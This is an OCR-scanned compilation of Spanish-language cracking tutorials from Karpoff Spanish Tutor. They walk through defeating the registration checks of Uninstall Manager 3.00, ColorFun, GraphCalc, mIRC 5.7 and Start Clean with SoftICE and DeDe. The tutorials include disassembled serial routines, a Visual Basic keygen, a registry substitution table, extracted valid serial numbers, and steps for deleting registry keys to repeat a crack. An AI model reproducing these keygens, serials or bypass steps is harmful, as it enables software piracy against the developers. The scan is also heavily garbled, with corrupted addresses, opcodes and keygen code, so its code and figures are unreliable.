el siguiente paso será, emplear la herramienta dede v2.34 [dafixer] un excelente desensamblador para delphi, bien ejecutamos el 
dede y seleccionamos nuestra "victima" - uninstall manager 3.00 y pulsamos el botón [process] esperamos hasta que nos aparezca 
el mensaje "dump successful !:)'' y observaremos lo siguiente: 


 ¡DeDe v2.34 (c) 1999-2000 by DaFixer 
File Dumpers Tools Options ¿About 


je: 4UMsUninsman.exe y ] 5] Pa | uninsman 
[ 


Classes Info | Forms ¡[Procedures | Project | Exports | 
TAboutBox 


TáboutB ox Comval 
TExtrabox | Events | ontrols | 
Tocheckwiz 

TForrn1 


TWizbox FormCreate 004745D4 0011 
OKBtnClick 00474 9BC 0011 
Button1 Click 00474EDO 0013 
GetYolumelnto 0047446C 0014 
decode 00474380 D000D 


Ready 4 sec. ¡Uninsman.exe 1743936 bytes 


por donde empezamos a tracear? pues, muy fácil, si nos fijamos en el proceso que sigue para registrarnos, el propio programa 
"victima" nos da la respuesta. primero nos aparecerá la típica pantalla de información about uninstall manager con dos botones, 
[register] y [ok], pulsamos el botón [register] y nos aparecerá la ansiada pantalla de "registration" pidiéndonos, lo siguiente: 


NOVA A SORA ATL 


Registration Name 
Registration Key 


Register Online 


pues, ya esta, regresamos al dede v2.34 si pulsamos sobre about nos aparecerá como vemos en la imagen cinco eventos, ahora 
pulsamos con el botón derecho del ratón sobre button1click nos aparecerá un menú y seleccionamos show additional data 
apareciéndonos la siguiente información: 


button1 click 


event = onclick 
owner = button1(tbutton) 
caption = 'register' 


lo normal sería tracear el evento button1 click pero no es lo correcto;) si nos fijamos hay otro evento con un nombre muy muy muy 
curioso decode;) 


vamos a tracearlo, hacemos dobleclick sobre el evento decode y vemos el siguiente código: 


ei taboutbox.decode 


00474380 55 push ebp 
00474381 Sbec mov ebp, esp 
00474383 33c9 xor ecx, ecx 
00474385 51 push ecx 
00474386 51 push ecx 
00474387 51 push ecx 
00474388 51 push ecx 
00474389 53 push ebx 
0047a38a 56 push esi 
0047a38b 57 push edi 
0047a38c Sbf0 mov esi, eax 
0047a38e 33c0 xor eax, eax 
00474390 55 push ebp 


* possible string reference to: "¿O*gyéG4_'[<á]iruaridyyysv %oui<etiéá»py3auh Yg 
| 
00474391 685ba44700 push $0047a45b 


ES try 


| 

00474396 64130 push dword ptr fs:[eax] 
00474399 648920 mov fs:[eax], esp 
0047a39c 33db xor ebx, ebx 

0047a39e Sd55f4 lea edx, [ebp-$0c] 


* possible reference to control 'editl:trichedit' 


0047a3a1 8b86f4020000 mov eax, [esi+$02f4] ¡carga puntero 

0047a3a7 eSbcó6afbff call 00430€68 

0047a3ac 837df£400 cmp dword ptr [ebp-$0c], +$00 ;es el último caracter? 
0047a3b0 747e jz 00474430 ¡si = 0 salta 00474430 

0047a3b2 Sd55fc lea edx, [ebp-$04] 


* possible reference to control 'editl:trichedit' 


| 

0047a3b5 8b86£4020000 mov eax, [esi+$02f4] 
0047a3bb eSaScafbff call 00430€e68 

0047a3c0 Sb45fc mov eax, [ebp-$04] 

0047a3c3 eScc9af8ff call 00403894 

0047a3c8 Sbf8 mov edi, eax 

0047a3ca Sd55f0 lea edx, [ebp-$10] 

0047a3cd 8b45fc mov eax, [ebp-$04] 

0047a3d0 eSe7e1f8ff call 004085bc 

0047a3d5 Sb55f0 mov edx, [ebp-$10] 

0047a3d8 8Sd45fc lea eax, [ebp-$04] 

0047a3db e8d098f8ff call 00403cb0 

0047a3€e0 33db xor ebx, ebx ;ebx = 0 

0047a3e2 85ff test edi, edi ¡comprueba si edi=0 
0047a3e4 7e20 jle 00474406 ;si <= salta 00474406 
0047a3€6 b801000000 mov eax, $00000001 ;¡eax=1" caracter 


0047a3eb 8b55fc mov edx, [ebp-$04] 

0047a3ee 8a5402ff mov dl, byte ptr [edx+eax-$01] 

0047a312 80fa20 cmp dl, $20 ¡comprueba si es blanco (20h=32) 
0047a3£5 740b jz 00474402 ;si = 0 salta 00474402 

00474317 8b4dfc mov ecx, [ebp-$04] ¡copia puntero de nuestro name 
0047a3fa 81e2f£f000000 and edx, $000000ff ¡suma lógica (edx = edx + ffh) 
0047a400 03da add ebx, edx ¡ebx = ebx + edx 

00474402 40 inc eax ¡siguiente caracter 

00474403 4f dec edi ¡decrementa contador 

00474404 75€e5 jnz 0047a3eb ;si <> 0 salta 0047a3eb 

00471406 811£389000000 xor ebx, $00000089 ;xorea ebx con 89h(=137) 
0047a40c 831333 xor ebx, +$33 ;xorea ebx con 33h(=51) 

0047a40f 43 inc ebx ;ebx = ebx + 1 

0047a410 8d55f8 lea edx, [ebp-$08] 


* possible reference to control 'edit2:tedit' <eomocmocicnncanmamas registration key 


| 

00471413 8b86f3020000 mov eax, [esi+$02f8] 

0047a419 eS4a6afbff call 00430€68 

0047a41e Sb45f8 mov eax, [ebp-$08] 

0047a421 eSeee4fSff call 00408914 

00474426 3bd8 cmp ebx, eax ¡compara ebx(key válido) con eax(key dummy) 
0047a428 7504 jnz 0047a42e ;si no es zero (ebx<>eax) ''mal chico'' salta a 0047a42e 
0047a42a b301 mov bl, $01 ;si es zero (ebx=eax) correcto * registered * 
0047a42c eb02 ¡mp 00474430 ¡salta a 00474430 

0047a42e 33db xor ebx, ebx ;ebx = 0 

00474430 33c0 xor eax, eax ¡eax = (0) 

00474432 5a pop edx ;restaura edx 

00474433 59 pop ecx ¡restaura ecx 

00474434 59 pop ecx ¡restaura ecx 

00471435 648910 mov fs:[eax], edx 


ES finally 


* possible string reference to: ''<á_"[<áJaruaridyyysv«¡%ouii<eitá>0y3auh Yg" 


00471438 6862444700 push $0047a462 
0047a43d 8d45f0 lea eax, [ebp-$10] 
00474440 eSd397f8ff call 00403c18 
00474445 8d45f4 lea eax, [ebp-$0c] 
00474448 eScb97f8ff call 00403c18 
0047a44d 8d45f8 lea eax, [ebp-$08] 
00474450 ba02000000 mov edx, $00000002 
00474455 eSe297f8ff call 00403c3c 
0047a45a c3 ret 

0047a45b e94092f8ff ¡mp 00403640 
00474460 ebdb ¡mp 0047a43d 


== end 


| 

0047a462 8bc3 mov eax, ebx 
00474464 5f pop edi 
00474465 5e pop esi 
00474466 5b pop ebx 
00474467 8be5 mov esp, ebp 
00474469 5d pop ebp 
0047a46a c3 ret 


ei taboutbox.decode 


(1) estudio de la rutina de generación del key 


utiliza 2 variables, una de ellas almacena el texto original introducido, la otra lo transforma en minúsculas para obtener el reg 
key. comprueba si el primer carácter es blanco sino va extrayendo carácter a carácter y suma el valor ascii de cada uno de ellos 
hasta el final de la string$. es un bucle que comienza en 0047a3eb hasta 00472404 en el que monta la primera parte del número 
de registro. 


cuando termina de recorrer todo el nombre, sigue en 00474406 y xorea el resultado con el número 89h = 137 y el resultado 
obtenido lo xorea con el número 33h = 51, y el resultado lo suma con el número 1h. quitamos blancos a la string$ y obtenemos 


el *registration key valido*. 


si miramos unas líneas más abajo, vemos que hay una comparación entre ebx y eax que es evaluada en la siguiente línea 
haciendo un salto a 00474428 en caso de que no son iguales. 


si son iguales, mueve un 1 a bl, en la línea 0047a42a 


ojo! solo visualiza 27 caracteres en la pantalla about. 


(ii) estudio de la rutina de generación del key -regedit.exe- 


estudiando el comportamiento del uninstall manager a través del regedit.exe de micro$oft windows 9x, observamos un campo 
clave llamado reg donde almacena el nombre registrado. 


hkey_current_userisoftwarelnoktasoftwareluninstallermanager 
por ejemplo, para el registration name : erOser almacenara en el campo clave reg : ¡Qmzh(mz. 


si empleamos el registration name : +erOser'2000 almacena en el campo clave reg : ¡QHmzh(mz/:888 y si repetimos con el 
registration name : +erCOser obtenemos el reg : ¡O%mzh(mz. 


podemos observar que en estos 3 casos se repite la cadena "'¡O" - esta cadena indica al programa que estamos registrados, por 
tanto podemos jugar directamente con el regedit, empleando la tabla de caracteres (de abajo). 


a partir de los datos de esta "tabla de carácteres" podemos construirnos una pequeña utilidad, que atake directamente al campo 
clave reg almacenando la string$ correspondiente al name introducido;). 


tabla de caracteres uninstall manager v3.0.0 


(alt+65) a =i (alt+73) (alt+165)1 = u (alt+235) (alt+49) 1 = 9 (alt+57) (alt+164) ñ = ú (alt+73) (alt+111) o = g (alt+103) 


(alt+66) b = j (alt+74) | (alt+79) o = g (alt+71) | (alt+50) 2 = : (alt+58) (alt+98) b = j (alt+106) | (alt+112) p = x (alt+120) 
(alt+68) d =1 (alt+76) | (alt+81) q = y (alt+89) (alt+52) 4 =< (alt+60) | (alt+100) d=1 (alt+108) | (alt+114) r =z (alt+122) 
(alt+70) f=n (alt+78) (alt+83) s = [ (alt+91) (alt+54) 6=> (alt+62) | (alt+102)f=n (alt+110) (alt+116) t =| (alt+124) 
(alt+71) g=0 (alt+79) — | (alt+84) t=1(alt+92) (alt+55) 7 =? (alt+63) | (alt+103)g=o0 (alt+111) (alt+117) u =) (alt+125) 

| (alt+72) h=G (alt+64) | (alt+85)u=](alt+93) | (alt+56)8=0(alt+48) | (altr104)h=" (alt+96) | (alt+118) v=- (alt+126) 


(alt+119) w = €127; 
(alt+127) 


(alt+74) j = b (alt+66) (alt+87) w = _ (alt+95) (alt+48) 0 = 8 (alt+56) (alt+106) j = b (alt+98) (alt+120) x = p (alt+112) 
(alt+75) k = c (alt+67) (alt+88) x = p (alt+72) (alt+107) k = c (alt+99) (alt+121) y = q (alt+113) 


(alt+73) i = a (alt+65) | (alt+86) v = * (alt+94) | (alt+57) 9 = 1 (alt+49) (alt+105) i = a (alt+97) | 


(alt+76) 1 = d (alt+68) | (alt+89) y = q (alt+73) (alt+108) 1 = d (alt+100) | (alt+122) z = r (alt+114) 
(alt+77) m = e (alt+69) (alt+90) z = r (alt+74) (alt+109) m = e (alt+101) 
(alt+78) n = f (alt+70) (alt+110) n = f (alt+102) 


* caracteres especiales * 

| (alt+32) =((alt+40) | (alt+33)!=(alt+32) — | (alt+221)|=t(alte116) | — (alte35)”=(alt+32) | (alt+34)"=) (altt4) 
(alt+64) O =h (alt+72) | (alt+35) “="4(alt+172) | (alt+33)-=* (alt+42) (alt+35) H=+ (alt+43) — [| — (alt+44),= $ (alt+36) 
(alt+36) $=¿ (alt+168) | (alt+170) ==X(alt+207) | (alt+59);=3 (alt+59) (alt+37) % =, (alt+44) — | (alt+94) ” =v (alt+86) 


(alt+46) . = 2 (alt+58) (alt+38) 8: =- (alt+45) (alt+42) * = " (alt+34) (alt+58) : = _ (alt+95) (alt+33) /=. (alt+46) 
(alt+128) q =1 (alt+216) (alt+45) - = % (alt+37) (alt+40) (=" (alt+39) (alt+135) q =1 (alt+139) (alt+95) _ = w (alt+87) 
(alt+41) ) =! (alt+33) (alt+96) * =h (alt+104) | (alt+60) <= 4 (alt+52) (alt+33) == 5 (alt+53) (alt+43) + =+f (alt+35) 


(alt+62) > = 6 (alt+54) (alt+33) ? =7 (alt+55) (alt+91) [ = s (alt+83) (alt+167) * =2 (alt+253) (alt+33) ¿ =- (alt+46) 
(alt+93) ] =u (alt+85) — | (alt+166)*=¿ (alt+189) | (alt+39) '=/(alt+47) (alt+125) ) =u (alt+117) | (alt+92)1=t (alt+84) 


(alt+173) ¡ = O (alt+184) (alt+123) [ = s (alt+115) 


* key generator uninstall manager 3.00 en visual basic 6 * 


un saludo! 


+erOser'2000 
for the new millennium 


' nombre : uninstall manager 3.0 keygenerator 
' autor : +erOser'2000 [for the new millennium] 
' creado : lunes, diciembre 25,2000 > 6:45:22 pm (vers: 1.0.0000) 
' herramientas: softice 4.05, dede 2.34, visual basic 6 


' descripción : uninstall manager ver. 3.00 


private sub textl_change() 
dim user_namel$, user_name2$ 
dim key!, x!, 1! 
user_namel = trim$(textl.text)xt) 'quitamos blancos 
user_name?2 = Icase$(textl.text) t) 'y en minúsculas 
l] = len(user_namel) 
key =0 
forx=1tol 
if mid$(user_name?2, x, 1) <> "' " and 1 <= 27 then 'distinto de blanco y 
user_namel = asc(mid$(user_name?2, x, 1)) 'restringimos name a 27 caracteres 
key = key + user_namel 'textl.textbox maxlength = 27 
end if 
next x 
key = key xor £h898 'xor ebx, 00000089 
key = key xor €¿h334 'xor ebx, 00000033 
key = key + £h18 "inc ebx 
text2.text = key 
end sub 


-=ANW- your mind is the power -/VV=- 


om ++ agradecimientos +--=-- - 


karpoff, demian, black fenix, prOfesor x, numit_or, esiel 2, mr. crimson, mr. white, mr. green, tnt, wkt, kut y a todos los crackers 


del pasado, presente y futuro. 
mmm Hom E Hem - 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre 


ingenieria inversa 


y programacion. email "colabora con tus proyectos" 


Programa: 


PROTECCION: 
Objetivo: 
Descripcion: 
Dificultad: 
DOWNLOAD: 
Herramientas: 


CRACKER: 


Karpoff Spanish Tutor 2001 


ColorFun v1.3 Build 2.28.10.00 


Serial, Limitacion de 7 dias. 
Encontrar un numero de registro. 
Juego tipo tetris 

Facililla. 


http://jaibosoft.8m.com/colorfun/index.htm 


Softice 


Pedrolas N2 4 FECHA: 16/01/2001 


introduccion 


colorfun v1.3 build 2.28.10.00 es un jego tipo tetris en el que tienes que hacer 3 o mas figuras en raya y 


asi ganar puntos. 


al atake 


cuando abrimos por primera vez el programa nos encontramos con la siguiente pantalla de bienvenida: 


ColorFun Registration Reminder ES! 


Two games. only for. $19.90 11 
Dr three games only for $24,901. 


This program is shareware. You can try it for 7 days and should 
register to continue using il after this period. The registration tee 
1s only $14.90 (US Dollars] Registration benefits: 
-the Registration Reminder screen remove: 
+ you can send pour results to the Intermet Table 11 
-0y temaih a registered user foral future versions ol ColorFun 
Also you can get TWO GAMES only for $19.90 | 
Or THREE GAMES only for $24.90 111 For more info. press bulton, 
For more information press: button" "How to Register ColorFun?" 
For Online Registration press button "Online Registration". 

You are on D day of your 7 days trial period 


y Please enter your personal Registration Code 


Your Name: | , 
Register 


Your Registration Lode 


AAA, 


en ella podemos ver que solo tenemos 7 dias para evaluar el programa y un poco mas abajo vemos el lugar donde 
tenemos qye poner nuestro nombre y numero de registro. 
yo lo he rellenado de esta manera: 
name: pedrolas 
code: 12345678 
he puesto 8 numeros intencionadamente por una cosa que luego os explicaré. llegado a este punto pulsamos "register 
y nos sale una ventanita que nos informa que el numero introducido no es bueno. 


ColorFun 


: IN ERRADA! Incorrect Registration cade. Please try again 


volvemos a rellenar el name y code con lo mismo de antes, abrimos el softice y ponemos un breakpoint a la funcion 
hmemcpy, esto es: 

bpx hmemcpy enter 

y luego f5. 

volvemos al programa y pulsamos "register" de nuevo, y zassss, salta el softice. pulsamos f11 y luego f12 un monton 
de veces hasta que llegamos a la siguiente linea: 


0042c350 mov edx,[esi+7c] 

0042c353 lea edi,[esi+7c] 

0042c356  cmp dword ptr [edx-08],08 <---comprueba que el codigo sea de 8 cifras 
0042c35a jz 0042c3a7 


pulsamos f10 y cuando llegamos al salto jz seguimos dandole a £10, ahora comprueba que los caracteres del codigo 


sean numeros, asi que os hartareis de darle a £10, y seguis dandole hasta que aparezca la siguiente linea: 


0042c5a5 call 0042c810 <-- pulsamos f8 para entrar en la call 
0042c5aa test eax,eax 
0042c5ac ¿nz 0042c5e7 


cuando entramos en la call caemos en la siguiente linea: 
0042c810 push ff 
seguimos dandole a £10, hasta que aparece lo siguiente: 


0042c8aa cmp eax,012c8274 <--- compara nuestro 12345678 con el 012c8274 en hexadecimal 
0042c8af jnz 0042c8da 


ponemos ?012c8274 y el softice nos devuelve la siguiente cifra: 19694196, un numero de registro valido. 
si seguimos dandole a f10 caemos en la siguiente linea: 


0042c8da cmp eax,051db10b 
0042c8df jnz 0042c90a 


joder, otro numero, el 051db10b = 85831947 
podeis seguir sacando numeros continuamente, ya que tiene hasta 100 numeros de registro fijos. 
llegados a este punto, ponemos bc* y luego f5 para salir del softice. 


colocamos el numero que hemos obtenido en el registro del programa y conseguimos la siguiente pantalla: 


ColorFun 


(E) Thank pot for support 
Now. you can send your results to the Internet table | 


y esto es todo amigos...... 


bilbao, a 16 de enero de 2001 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


Karpoff Spanish Tutor 2001 


Programa: GraphCalc v3.1 

PROTECCION: Serial. 

Objetivo: Encontrar un numero de registro. 

Descripcion: Programa para hacer graficas en 2D y 3D 

Dificultad: Newbie. 

DOWNLOAD : http://www.graphcalc.com/ 

Herramientas: Softice 

CRACKER: Pedrolas N* 5 FECHA: 17/01/2001 
introduccion 


graphcalc v3.1 es un programa que sirve para resolver ecuaciones, dibujar gráficas de ecuaciones tanto en 2d 
como en 3d. 


como ingeniero industrial que soy me ha agradado mucho encontrarme con este programa, espero que os 
guste a vosotros tambien como lo ha hecho a mi. 


al atake 


comenzamos abriendo el programa y vemos que a la hora de hacer determinadas cosas con el programa no nos deja, 
sacando una ventana que nos dice que nos tenemos que registrar. 


vamos al menu "help" y le damos a "register". entonces nos sale la siguiente pantalla: 


Register 


Name [Pecrolas 
Registration Code [ 23456789 


coa_| 


que la rellenamos con nuestros, en mi caso he puesto: 


name: pedrolas 2001 
registration code: 123456789 


como es obvio el programa no traga y nos avisa de que el numero es incorrecto: 


Unregistered Version of GraphCale 


Q Invalid Registration Code 


volvemos a rellenar los datos de la misma manera, pero antes de darle al ok, le damos ctrl+d y ponemos en el softice 
bpx hmemcpy 
pulsamos enter y luego f5 


ahora le damos a ok y salta el softice, pulsamos f11 y luego f12 hasta que aparezca que estamos en el graphcalc, 
entonces le damos a £10 hasta que aparezca la siguiente linea: 


004a4b89 pop esi 


le damos un d ecx y vemos que sale nuestro nombre, pero si le damos a e ecx y en la ventana de datos bajamos un poco 
nos encontraremos con el codigo de registro: 


1kb88eev9ujbw, le quitamos el jpw y ya tenemos nuestro numero de registro, por tanto rellenamos la pantalla de 
registrarnos de la siguiente manera: 


name: pedrolas 
registration code: 1kb88eev9u 


entonces le damos a ok y nos sale la siguiente pantalla: 


Thank You 


ui) Thank you for registering GraphCale 


ya tenemos el programa registrado. 


bilbao, a 17 de enero de 2001 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


Karpoff Spanish Tutor 2001 


INTRODUCCION 


. qué onda raza!!! como que estos últimos días de vacaciones nos obligan a trabajar 
un poco mas, y es por esto que su amigo ”[glole[e]? regresa. okas, esta vez traigo un 
objetivo que se puede catalogar como nivel medio, pues si, medio porke rekiere que 
puedas manejar mas el asm, pero lo trataré de poner fácil, ya que comprendo que no 
solo crackers medios y elite podran ejecutarlo, ademas, la información es un derecho, 
la info es conocimiento, y el conocimiento es poder. okas, yo utilizaré mirc v.5.7, la 
verdad es que me gusta mucho chatear, así que lo conseguí, es mejor con el x-cript 
(ke valga la propaganda, poke no me pagan). 

okillas, pueden descargar el x-cript con mirc incluido en la página del x-cript 


let's work, digo, 
trabajemos 


que encontraras akí : 


1)buscando algo útil 


2)herramientas 


3) manos a la obra 


3)despedida 


1)buskando algo útil 


. Okas, de ahora en adelante, debes meter en tu cabecita lo siguiente: "conoce a tu enemigo y lo venceras 
facilmente". lo kiero darte a enteder con esto, es que debes tratar de comprender el comportamiento 
de tu enemigo, ve a la ventana help, luego a register, e ingresa lo ke kieras, yo lo haré así: 


mliRC Registration Xx] 


Full Name: 


[TalisO LvS KaRi 


Registration Code: 


fos 1-99 


| 
How to register 
Cancel | 


le damos register, y nos topamos con un mensaje ke dice: "sorry, your registration..." 


bueno, aparte de esto, el mirc es uno de los mejores programas para chatear, y con un buen script, 
mucho ke mejor. 


2) herramientas 


utilizaremos w32dasm para ver algunas partes interesantes del código. 
softice (cualquier versión, yo uso la 4.05). 
cerebro, papel y una pluma (lapicero, boligrafo, etc). 


3) manos a la ubre, digo, a la obra!!! 


okas, al inicio dije que sería un poco mas difícil, pero vamos a hacerlo paja (fácil), abrimos el mirc 
en w32dasm y despues de un buen rato, aparece, buscamos la cadena "sorry.....” y nos lleva al 
lugar, pero no vemos nada interesante (pensabas crackearlo nomas con un je/jne o un jz/jnz) así 
que vamos a algo mejor, vamos a la ventana de registro, ingresamos los datos necesarios pero sin 
presionar register. 


a esta altura, presionamos ctrl+d para ir a soft-ice, hay 2 formas de crackear esto, primero lo 
haremos fijando un: 


bpx getdlgitem | 


nada del otro mundo, ahora pulsas f5 o ctrl+d para regresar a windows, presionas el botón 
register y regresas al sice, bien, ahora presionas f11 para llegar al código del programa, hmmmm, 
no nos muestra el código sino el código de la api, bueno, no os preocupeis, f11 de nuez, y ahora 
si estamos alli, aterrizamos en una pieza de código que se vé así: 


* reference to:user32.senddlgitemmessagea,ord:0000h <---- api w32 que nos muestra la ventana de registro 
:00498a8b e841800500 call 004f0ad1 <----llama a la api que nos muestra la ventana de registro 
:00498a90 6833445000 push 00504a33 <----acepta el nombre/serial ingresados 

:00498495 6840465000 push 0050464c <----acepta el serial/nombre 

:0049829a eseSfbftftff call 00498684 <----llama una función para calcular y chequear el nombre/serial 
:00498a9f 85c0 test eax, eax <----tiene exito la prueba de registro o no 

:00498aa1 08490000000 je 00498b42 A A 
:00498a47 be3c9d4f00 mov esi, 004f9d3c 

:00498aac bf4c465000 mov edi, 0050464c 


bueno, si no entiendes, no hay clavinche, pero al haber presionado f11 2 veces, llegamos a la 
línea de código cuya dirección es "00498a76", k3wl1 no? pues sí, vamos por buen camino, ahora 


prepara tus dedos, que tendrás mucho trabajo que realizar con f10, tanto así que debes presionar 
f10 7 veces, cuando lo hagas, presiona f11 una vez, esto se debe a que el programa llama a una 
api, y aká nos lleva al código de la api, con el f11 regresas al código del mirc, si no, presiona otra 
vez f11. 

cuando hayas regresado al código del programa, presion f10 hasta que llegues a la dirección 
"00498a9a", la cual es un call, ahora presiona f8 (una sola vez). ahora llegarás a la dirección 
"00498684" presiona f10 hasta que llegues a la línea con dirección "004986e6" que también es 
una llamada, f8 para entrar en la llamada y luego f10 hasta llegar a la dirección "0049862a" (no 
te desesperes, debe hacer un largo chequeo, y retornará, pero luego si das demasiados f10, te 
perderás, así ke kalma pueblo. 


aka nos topamos con la primera parte de la rutina de chequeo, aca muestra la primera parte del 
s/n que ingresaste, pero recuerdas que el s/n que ingresé tenia un guión (-)? bueno, esto es 
porque 


:004985b1 e8c28cf6ff call 00401278 <----revisa si nuestro serial contiene un"-" 


bueno, quiza debí explicar antes esto, pero no le hace, okas, continuando, les decia que aca es 
donde se comparan el serial que ingresamos con el verdadero, que como lo se, vamos a verlo 
ahora: esto es una comparación en la que se comparan los números que están antes del guión, 
con los que genera el programa, en ebx estan los valores reales, y en ebp-04 los nuestros 
(aunque a mi me aparece un número nada que ver), okas, para ver el contenido usaremos el 
commando "d ebx" y chanananan.... wtf lo que aparece no es otra cosa que basura, 
buuuuuuuuuu, sos un maleta (ya me imagino a varios diciendolo, pero nada que ver) bueno, hay 
momentos en los que no podemos ver los contenidos con el commando dump, asi que 
utilizaremos otro commando, "? ebx" el cual se utiliza para evaluar el contenido, y encontramos 
que en mi caso, la primera parte de mi s/n es "10360", maravilloso, ahora solo keda ver la 
segunda parte, pero para hacerlo, debemos dejar que el programa nos muestre la ventana de 
error, así que f5 hasta que aparezca la ventana, y comenzaremos de nuevos. 


ahora, ingresamos otra vez nuestro nombre (para mí tanso lvs kari) y la primera parte de nuestro 
serial valido (10360-031199 ya saben por que siempre es el 031199) y de nuevo, presionamos 
register, seguimos todo el procedimiento anterior, solo que la ultima dirección a revisar, es decir 
donde se encuentra la comparación ya no será "0049862a", ahora la dejaremos llegar hasta 
"0049866a" y hacemos la evaluación, en este momento, ebx de nuevo almacena la parte de 
nuestro serial que nos interesa, y en ebp-08 esta lo que ingresamos. 


ahora tenemos nuestro serial completo, lo unico que nos queda, es unirl, en mi caso, el nombre 
es tanso lvs kari y el s/n completo es 10360-802802 


mIRC Registration! 
i) “Your registration has been entered successfully. 


Thanks for registering! :] 


presionamos aceptar, vamos de nuevo a help, y ahora nomas encontramos que dice about, le 
damos click, y vemos esto: 


About mIRC E 
miRCO v5.7 32bit 
An Internet Relay Chat Client 
Copyright Y 1995-2000 mIRC Co. Ltd. 
All Rights Reserved. 
Written by Khaled Mardam-Bey - 


| Licensed to: - Author! | 


TalNsO LvS KaRi 


Please visit the mIRC website for the latest version, 
hints and tips, and general IRC information. 


| _ http: ¿2 mirc.co.uk Visit 


4)despedida 


bueno raza, por hoy, esto es super, ya saben, si les gustaria que continuara escribiendo (digo, pa 
no sentirme tan mal) pues escribanme, ya sea que les haya gustado, o nomas pa decirme algo, 
aca estoy a su servicio (no lo tomen tan a pechos) y bueno, saludos a todos los amigos, karpoff, 
dek_oin, black fenix, etc. a mi amada kari, orale gente. si me quieren contactar, mi email es 
goleeuvOhotmail.com pd. se me olvidaba decirles, si kieren repetir el crack, se darán cuenta que si lo 
registraron una vez, ya no lo pueden hacer, esto es porque el programa crea una llave en el 
registro de windows, para poder repetir el crack, simplemente ejecuten regedit, y borren 
hkey_current_usersoftwarel mira license y hkey_current_userlsoftwarel mirclusername. bueno 
este es el fin de mi segundo tut, no es cosa del otro mundo, pero tampoco es tan paja, asi que 
haganle ganchos y pues sabrán que todo se les facilita. 


disclaimer: este documento fue escrito con fin educacional, por lo tanto, el autor no se 
responsabiliza de las acciones tomadas por terceros, ya que la información no es ningun 
delito. 
no knowledge that is no power 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


Karpoff Spanish Tutor 2001 


Como Crackear Start Clean v1.2 


INTRODUCCION 


. tag!!! 


. qué onda raza!!! pues los saluda su amigo "[glole[e]?, si el de las traducciones, o 
como dice karpoff andrik, pues está vez no os traigo ninguna traducción sino mi 
primer tutorial, este es uno de los objetivos mas viejos que hay, pero es eficiente para 
empezar nuestra carrera, no es una gran cosa como mucho podrán pensar, es mucho 
mas paja de lo que piensan (perdon si hay cosas que no entienden, si algo no queda 
claro, escribanme y tratare de explicarlo bien, ya que no tengo mucha experiencia 
escribiendo tutoriales y mi forma de hablar es muy diferente, asi que tratare de no 
usar muchas expresiones de mi natal guatemala). 

. Okillas, este es mi primer tutorial, con esto kiero empezar a ayudar al surgimiento de 
una nueva generación. este tut es dedicado a k4r1, ke aunke no tiene nada ke ver con 


todo esto, pues es mi novia. 
let's work, digo, 
trabajemos 


contenido : 


O)descarga del programa. 


1)reconociendo al enemigo 


2)herramientas 


3)comienza la acción 


3)despedida 


1)reconociendo al enemigo 


. Okas, antes de comenzar dejenme decirles que esto del crackin' no es para que la raza vea que 
eres k3w1 o que eres algo fuera de lo común, aunque si lo eres, no vas a andar flamenado a los 
wannabes. sería grandioso que tomaras en cuenta que tienes mucho que hacer, como por ejemplo 
aprender assembler, no te digo que tienes que dominarlo a la perfección, pero que sí sería de gran 
ayuda (te recomiendo las lecciones de iczelion), aunque en este tut no te será necesario, ya que 
trato de hacerlo lo mas fácil y entendible que puedo. familiarizate con soft ice (sice, si, etc), si no 
sabes que teclas presionar, te lo diré, yo uso el winice.dat de la página de the sandman, encuentralo 
en su página, encontrarás el link en la página de karpoff, y si no lo encuentrás pidemelo, ke te lo 


enviare. 


. Okas, el reconocimiento que debemos hacer es el de iniciar el programa, y al hacerlo verás lo 
siguiente: 


Ifyou intend to use Start Clean 
for more than 30 days, you must register. 


send a check or money orderfor $10 U.S. with your name, 
address, *e-mail* address, and phone numberto: 


Firas El-Hasan - Start Clean 
4137 Y. 132nd St 
Hawthorne, CA 90250 


On Compuserve, GO SW'REG using the following registration ID: 
9774 


Okas, ahora lo que tenemos que hacer es un click en el boton register, y verémos esto: 


Register 


Ifyou intend to use Start Clean 
for more than 30 days, you must register. 


Send a chec [UN Registration Info Xx] 
address 
Name: 


[ 
Code: 
 E__oooo— 


On Compuserw Lancel | 


your name, 
berto: 


registration ID: 


OK | Register... | 


ingresa algo en los campos, en el campo name yo ingresé tanso y en el otro 031199 (la fecha en 


k4r1 me dió el sí, tu puedes elegir lo que kieras) y obtienes un molesto mensaje que dice incorrect 
code! y bueno, ahora sabes como es que se comporta nuestro programa. 


. bueno no está demas decir que yo no le encontre ninguna utilidad a este programa. 


2) herramientas 


unicamente usaremos una herramienta, es nuestro amado soft ice (por cierto, para familiarizarte 


mas con él, leer los tuts que hay, si no estoy mal ya traduje uno, y hay uno bueno rondando por 
alli, y es el de black fenix). 


3)comienza la acción 


okas, ahora que ya sabes que es lo que hace el programa, estarás ansioso por empezar a 
crackearlo, así que no te repetiré que si te gusta el programa y despues de crackearlo kieres seguir 
usandolo, seria bueno que pagaras por él, hay gente que necesita vivir, ademas no tenemos que 
andar de lammers por allí, entendido? okas, ahora sí acción!. 

ahora ingresa tus datos, de nuevo (si cerraste el programa, aunke no creo que seas tan douh!!!) y 
antes de presionar el botón ok, presionas ctrl+d (la combinación control d), esto invokará al soft ice 
notaras que no puedes usar windows, esto es poke nuestro sice ha tomado el control de todos los 
procesos que se están llevado a cabo, entonces fijas varios breakpoints (si eres demasiado newbie, 
puedes leer los tuts de dek_oin para más info), para nuestros fines, fijaremos 3 bp, estos serán: 


| bpx getwindowtexta 


| bpx getdlgitemint 


bpx getdlgitemtexta 


lo anterior es la forma en que le decimos a sice que detenga todo proceso que utilice las apis 
indicadas, es decir, que si el programa que estamos crackeando usa alguna de esas funciones, 
automaticamente se detendrá la ejecución de modo que podamos obtener nuestro s/n valido. 

el bpx significa breakpoint on execution, en español breakpoint sobre ejecución, utilizamos esas 3 
funciones porque son las mas usadas para tomar el texto de los campos de texto en los 
programas, aunque hay muchas mas. 

okas, ahora presionad de nuevo ctrl+d y regresas a windows, ahora ya puedes presionar el botón 
ok. sice aparecerá, en este momento deberás presionar f11, esto para que soft ¡ce nos muestre el 
código del programa que está siendo crackeado, en este caso start clean. recuerdas que en la 
ventanita de registro habia 2 campos, bueno, al parecer ahora está rastreando el campo del 
